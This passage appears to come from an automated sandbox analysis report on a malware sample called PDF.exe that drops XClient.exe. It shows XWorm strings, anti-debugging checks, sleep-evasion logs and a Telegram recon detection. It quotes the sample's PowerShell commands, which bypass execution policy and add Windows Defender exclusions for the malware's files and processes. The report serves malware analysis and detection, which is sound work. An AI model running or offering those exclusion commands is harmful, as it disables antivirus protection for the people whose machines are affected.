                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596594s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596485s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596360s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596235s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596110s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595985s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595860s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595735s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595610s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595485s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595360s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595235s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -595110s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -594985s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -594860s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -594735s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep count: 6764 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 2896 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 7405 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 2152 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 1420Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599641Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599532Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599407Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599282Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599172Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598938Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598813Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598688Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598563Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598438Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598328Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597891Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597782Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597657Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597547Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597438Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597313Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597063Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596938Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596828Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596719Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596594Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595985Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595860Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595735Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595610Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595485Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595360Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595235Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595110Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594985Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594860Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594735Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                                    Source: XClient.exe.0.drBinary or memory string: vmware
                                    Source: PDF.exe, 00000000.00000002.2931983795.000000001B710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                    Source: C:\Users\user\Desktop\PDF.exeCode function: 0_2_00007FFD9B7C72A1 CheckRemoteDebuggerPresent,0_2_00007FFD9B7C72A1
                                    Source: C:\Users\user\Desktop\PDF.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\PDF.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'Jump to behavior
                                    Bypasses PowerShell execution policy
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                                    Source: PDF.exe, 00000000.00000002.2898462305.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2898462305.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                                    Source: PDF.exe, 00000000.00000002.2898462305.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2898462305.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: PDF.exe, 00000000.00000002.2898462305.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2898462305.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                                    Source: PDF.exe, 00000000.00000002.2898462305.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2898462305.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                                    Source: PDF.exe, 00000000.00000002.2898462305.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2898462305.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2b

                                    Language, Device and Operating System Detection

                                    barindex
                                    Yara detected Telegram Recon
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                                    Source: C:\Users\user\Desktop\PDF.exeQueries volume information: C:\Users\user\Desktop\PDF.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
